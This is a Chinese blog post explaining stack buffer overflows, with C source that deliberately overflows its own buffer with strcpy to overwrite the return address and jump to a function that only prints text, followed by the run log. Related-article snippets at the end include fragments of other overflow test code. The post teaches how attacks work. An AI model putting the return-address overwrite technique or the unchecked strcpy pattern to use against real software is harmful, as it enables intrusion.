缓冲区溢出原理+源代码

最新推荐文章于 2023-05-16 20:05:56 发布
最新推荐文章于 2023-05-16 20:05:56 发布
阅读量2k 收藏 2
点赞数
分类专栏: 2 GNU C/C++语言 文章标签: hook constants 框架 linux string shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/freedom1013/article/details/1561240
版权
在当前网络与分布式系统安全中,被广泛利用的50%以上都是缓冲区溢出,其中最著名的例子是1988年利用fingerd漏洞的蠕虫。而,中,最为危险的是堆栈溢出,因为入侵者可以利用堆栈溢出,在函数返回时改变返回程序的地址,让其跳转到任意地址,带来的危害一种是程序崩溃导致拒绝服务,另外一种就是跳转并且执行一段恶意代码,比如得到shell,然后为所欲为。我在这里演示一下堆栈溢出的原理。
首先,介绍一下,与堆栈有关的一些概念:动态内存有两种,堆栈(stack),堆(heap)。
堆栈在内存上端,堆在内存下端,当程序执行时,堆栈向下朝堆增长,堆向上朝堆栈增长。
通常,局部变量,返回地址,函数的参数,是放在堆栈里面的。
栈的分布视图:
低地址
    局部变量
    旧的基指针
    返回地址
    函数的参数(左)
    函数的参数(。。。)
    函数的参数(右)
高地址
缓冲区溢出就是得意于上面这个组成原理级的栈分布,就不明白当初为什么计算机设计者要将局部变量放在了返回地址的上面了呢。哈哈。
贴出我写的代码+运行后的信息:
/* ********************************************************************************************************
*  FileName:      memory_overflow.c
*
*  Author:                            Version :                Date(Y/M/D):
*  liyangth@gmail.com              1.0                    2007-04-11    
*
*  Description:    实现了缓冲区溢出来执行我们想要执行的自己的函数; 
*                                
*    Note:
*        关键点:
*            [1]找到SRC_BUF_SIZE的大小,即:找到des_buf的地址和返回地址;
*
*            [2]找到攻击函数的地址;
********************************************************************************************************* */


/* ****************************************************************************
 * include files (#include)
  */
#include  < stdio.h >
#include  < string .h >



/* ****************************************************************************
 * Constants (#define)
  */
#define  SRC_BUF_SIZE    14                /* 返回地址与des_buf的地址的间距 */

/*  要填充攻击函数地址的那四个字节  */
#define  HOOK_ADD0        (SRC_BUF_SIZE)
#define  HOOK_ADD1        (SRC_BUF_SIZE+1)
#define  HOOK_ADD2        (SRC_BUF_SIZE+2)
#define  HOOK_ADD3        (SRC_BUF_SIZE+3)

#define  DES_BUF_SIZE    6                /* 无所谓,但是肯定是小于SRC_BUF_SIZE的 */

/* ****************************************************************************
 * Function Prototypes
  */
/*  Global Functions  */

/*  Static Functions  */
static   void  test( char   * );
 static   void  hook_foo( void );

 int  main()
{
 #if  1               
     char  src_buf[SRC_BUF_SIZE];
     int  i;
    printf( " ATTACK CODE " );
     /*  fill with the src_buf  */
     for (i  =   0 ; i  <  SRC_BUF_SIZE; i ++ )
        src_buf[i]  =   ' x ' ;    ;     /*  覆盖不重要的部分  */

     /*  在这里改写了返回地址,达到来执行我们自己的攻击函数  */
     /*  你可以在这写任何你想要执行的函数的地址  */
    src_buf[HOOK_ADD0]  =   0x91 ;
    src_buf[HOOK_ADD1]  =   0x85 ;
    src_buf[HOOK_ADD2]  =   0x04 ;
    src_buf[HOOK_ADD3]  =   0x08 ;
    
#else
    printf( " TEST CODE " );
     char  src_buf[]  =   " hello " ;
 #endif
    test(src_buf);
     return   0 ;
}


 static   void  test( char   * src_buf)
{
     char  des_buf[ 6 ];
     char   * i;
   
    strcpy(des_buf,src_buf);
    
    printf( " &main:        [%p] " & main);         /*  从这知道main函数栈框架大概的区域,用于一会找返回地址用  */
    printf( " &test:        [%p] " & test);
    printf( " &hook_foo:    [%p] " & hook_foo);     /*  从这得到攻击函数的地址  */
    
    printf( " ********* " );
    printf( " &des_buf:    [%p] " & des_buf);         /*  从这得到des_buf的地址,找到返回地址后,用返回地址减它来得到SRC_BUF_SIZE  */
    printf( " &src_buf:    [%p] " & src_buf);         /*  形参,一般返回地址就在它上面,再根据main的地址就可以判断出哪4个字节是返回地址了  */
    
    printf( " ********* " );
     for (i  =  (( char   * ) & des_buf); i  <  (( char   * ) & src_buf) + 4 ; i ++  )
        printf( " %p:[0x%x] " , i,  * (unsigned  char   * )i);
        
}

 static   void  hook_foo( void )
{
     /*  攻击代码  */
    printf( " GoodP Fly! " );
    printf( " GoodP Fly! " );
    printf( " GoodP Fly! " );
    printf( " GoodP Fly! " );
}
 
linux:~/Ctest # gcc memory_overflow.c -o liy
linux:~/Ctest # ./liy 
ATTACK CODE
Befory strcpy
显示各个函数,参数,局部变量的地址,以及局部字符串变量des_buf和参数src_buf之间的地址,我们看到:
&main:          [0x8048438] /* 我们知道main框架是在0x8048438 */
&test:          [0x80484a6]
&hook_foo:      [0x804858e] /* 用于填充的攻击函数的地址 */
*********
&des_buf:       [0xbffcc7ce] /* 一会儿用返回地址来减它 */
&src_buf:       [0xbffcc7e0] /* 它上面一般就是返回地址了 */
*********
0xbffcc7ce:[0x78] <--&des_buf
0xbffcc7cf:[0x78]
0xbffcc7d0:[0x78]
0xbffcc7d1:[0x78]
0xbffcc7d2:[0x78]
0xbffcc7d3:[0x78]
0xbffcc7d4:[0xd4]
0xbffcc7d5:[0xc7]
0xbffcc7d6:[0xfc]
0xbffcc7d7:[0xbf]
0xbffcc7d8:[0x78]
0xbffcc7d9:[0x78]
0xbffcc7da:[0x78]
0xbffcc7db:[0x78]
0xbffcc7dc:[0x91] <--这四个字节(0x8048591), 看看是不是和main的地址很像呢,证明它是在
0xbffcc7dd:[0x85]  main栈框架中的,
0xbffcc7de:[0x4]  而且也是在形参src_buf上,
0xbffcc7df:[0x8]  再看看是不是就是在test函数地址上呢,呵呵,他们都是在调用test前,压入main栈框架的;so,成功找的返回地址!!!
0xbffcc7e0:[0x78] <--src_buf
0xbffcc7e1:[0xc8]
0xbffcc7e2:[0xfc]
0xbffcc7e3:[0xbf]
   
GoodP Fly!  <--成功进入攻击函数 ^_^
GoodP Fly!
GoodP Fly!
GoodP Fly!
Segmentation fault
为什么最后会出现“段错误”呢,因为我们的攻击函数hook_foo根本找不到自己的返回地址呀。
freedom1013
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
缓冲区溢出原理
一杯水果茶!足矣~
12-05 1077
缓冲区溢出就好比一个杯子倒太多的水,溢出来,这叫溢出。
缓冲区溢出源码 C语言
04-24
在Windows XP VC++6.0环境下运行通过的缓冲区溢出程序源码
缓冲区溢出代码
ben1010101010的博客
03-31 1210
翻译自:https://www.geeksforgeeks.org/buffer-overflow-attack-with-example/ 有两种缓冲区溢出攻击的方式: 1. 基于堆 2. 基于栈 第一种实现困难,不常用 第二种非常常见,用到了栈 编译器提供在编译和链接的过程中进行溢出检查的选项,但是运行时间很难检查,除非要用到异常处理机制 下面就是一个栈溢出的代码: // A ...
java 缓冲区溢出_简单的【缓冲区溢出原理】(一)
weixin_35502173的博客
03-07 538
1. 一段具有缓冲区溢出的C代码[Asm] 纯文本查看 复制代码#include "stdio.h"#include "string.h"#include char payload[] = "aaaaaaaabbbbbbbbbbbbxxxx";void exp(){system("whoami");}void func(){char buffer[8];strcpy(buffer,pay...
缓冲区溢出原理
weixin_45007073的博客
05-07 4490
0x00 缓冲区溢出概念 缓冲区溢出是指当计算机向缓冲区内填充数据位数时超过了缓冲区本身的容量溢出的数据覆盖在合法数据上。 理想的情况是程序检查数据长度并不允许输入超过缓冲区长度的字符,但是绝大多数程序都会假设数据长度总是与所分配的储存空间相匹配,这就为缓冲区溢出埋下隐患,操作系统所使用的缓冲区,又被称为"堆栈"。在各个操作进程之间,指令会被临时储存在"堆栈"当中,"堆栈"也会出现缓冲区溢出。 0x01 缓冲区溢出原理 程序员通过往程序的缓冲区写超出其长度的内容,造成缓冲区的溢出,从而破坏程序的堆栈,使程序
缓冲区溢出攻防VC源代码
03-15
在本"缓冲区溢出攻防VC源代码"中,我们将深入探讨这一主题。 首先,我们要理解缓冲区溢出原理。在C/C++等编程语言中,程序员需要手动管理内存,这为缓冲区溢出创造了条件。当一个函数尝试写入超过其分配缓冲区...
《Q版缓冲区溢出》教程+全打包源代码.rar
05-28
本书定位于初学缓冲区溢出利用的读者;并照顾想学习缓冲区溢出技术的朋友。本书的目的是用幽默的语言和通俗的解释,对Windows缓冲区溢出编程的思路和思维进行详细分析;并用大量实例对溢出的实际利用进行一次又一次...
windwos操作系统下缓冲区溢出演示源代码
08-17
"www.pudn.com.txt"文件可能是相关教程或解释文档,包含了如何理解和分析源代码的指导,以及缓冲区溢出的基本原理和防护措施。例如,它可能讲解了以下知识点: - 长度检查:确保在向缓冲区写入数据前,检查数据长度...
Q版缓冲区溢出教程源代码
11-06
《Q版缓冲区溢出教程源代码》是一个专注于讲解缓冲区溢出安全问题的资源,主要面向对计算机安全有兴趣或从事相关工作的读者。缓冲区溢出是计算机编程中常见的安全漏洞,尤其在C/C++等低级语言中,如果不妥善处理,...
一个缓冲区溢出的测试代码
大博的博客
04-03 2189
# !usr/bin/python import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #socket默认使用的开头 print("devil buffer start") s.connect(('192.168.56.129', 110)) data = s.recv(1024) print d...
缓冲区溢出程序代码分析
11-14
缓冲区溢出程序代码分析 缓冲溢出是指一种攻击系统的手段,通过往程序的缓冲区中写入超出其长度的内容造成溢出,从而破坏程序的堆栈,使程序转而执行其它指令,而达到攻击的目的。分布式拒绝服务(ddos)的入侵者采用的是输入很长的字串,将通讯栏等区域填到超过设计的容量,有些多余字串就会被电脑误认为是执行密码,使入侵者有机会进入电脑,而同时系统无法察觉。有报告指出,“缓存溢出”是过去十年发生的非常普遍的电脑安全问题,入侵者可以利用它完全控制电脑。
Windows版本的二进制炸弹文件
08-26
CSAPP大名鼎鼎了,网上许多人都完成了其独具特色的实验,特别是二进制炸弹、缓冲区炸弹等。 二进制炸弹实验,主要锻炼学习者使用反汇编工具对二进制可执行程序调试、分析的能力。学习者首先需要使用调试器调试bomb可执行文件,对其进行反汇编分析,找出炸弹逻辑,并输入正确的密码,以便顺利拆除炸弹。 由于许多学习者对Linux不熟悉、对英文不熟悉,所以存在较大的畏惧心理。据此,我依据CSAPP二进制炸弹的原理,自行设计了一个可在windows下面运行的二进制炸弹,重新设计了关卡,并进行中文提示。这个二进制炸弹,主要面向大量学生的课堂,每个学生拿到的炸弹逻辑是不同的,这样每个学生的答案应该是不一样的。
缓冲区溢出教程(含ppt和全部源代码)
08-27
缓冲区溢出教程(基于JMP ESP)里面有示例代码(5个工程,Server,shellcode sender... ..),含有一个演示的ppt(Readonly)运行后,在机器上创建账户H,无害,有密码。环境 XP,VC6。
缓冲区溢出攻击的原理分析及防范
最新发布
qq_57335073的博客
05-16 1927
缓冲区攻击原理及示例
html缓冲区分析代码,HTML5 Video Player 1.2.5 缓冲区溢出分析
weixin_42480812的博客
06-07 253
放假前最后一天看到 exploit-db 上出了一个 HTML 5 Video Player 的缓冲区溢出的 exploit,版本是 1.2.5,(无心工作)就分析了一下这个漏洞,是一个比较简单的栈溢出漏洞,简单记录一下。因为最近在练习 windows 平台挖洞和写 exploit 的能力,因此就只看了 PoC 的说明部分:# PoC:# 1.) Generate exploit.txt, co...
一份简单的代码演示缓冲区溢出的危害
kinado的专栏
01-19 2773
最近学习到《深入理解计算机系统》这边书的3.12节的缓冲区溢出,于是写了个简单的测试代码演示了一下通过缓冲区溢出是如何神不知鬼不觉的运行一段代码的。 先上代码运行后再分析: #include void hit() { unsigned char buff[ 100 ] = { 0,0,0,0, //返回地址 'B','O','M','B','\0', 0x83,0xc4,0x80
缓冲区溢出原理分析
sweety870703的专栏
06-30 666
<br />缓冲区溢出(buffer overflow)是一种系统攻击的手段,通过往程序的缓冲区写入超出其长度的内容,造成缓冲区的溢出,从而破坏程序 的堆栈,使程序转而执行其它的命令,以达到攻击的目的。根据统计,通过缓冲区溢出进行的攻击占所有系统攻击总数的80%以上。之所以缓冲区溢出可以实现的 原因是系统程序没有检测用户输入的参数,也就是没有检测变量的长度是否符合要求。 <br /><br />   一个例子: <br /><br />   example1.c <br /><br />  
本地缓冲区溢出分析
CSDN
08-30 7186
栈溢出是缓冲区溢出中最为常见的一种攻击手法,其原理是,程序在运行时栈地址是由操作系统来负责维护的,在我们调用函数时,程序会将当前函数的下一条指令的地址压入栈中,而函数执行完毕后,则会通过ret指令从栈地址中弹出压入的返回地址,并将返回地址重新装载到EIP指令指针寄存器中,从而继续运行,然而将这种控制程序执行流程的地址保存到栈中,必然会给栈溢出攻击带来可行性。
缓冲区溢出-代码小看
ijkh007的专栏
01-08 253
#include #include int i=0; void ceshi(const char * input) { char buf[10]; strcpy(buf,input); //溢出语句 } void main() { i++; printf("我是main函数,我执行了%d次/n",i); char buffer[21]="ABCDEFGHIJKLMNOP/12/20/100
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值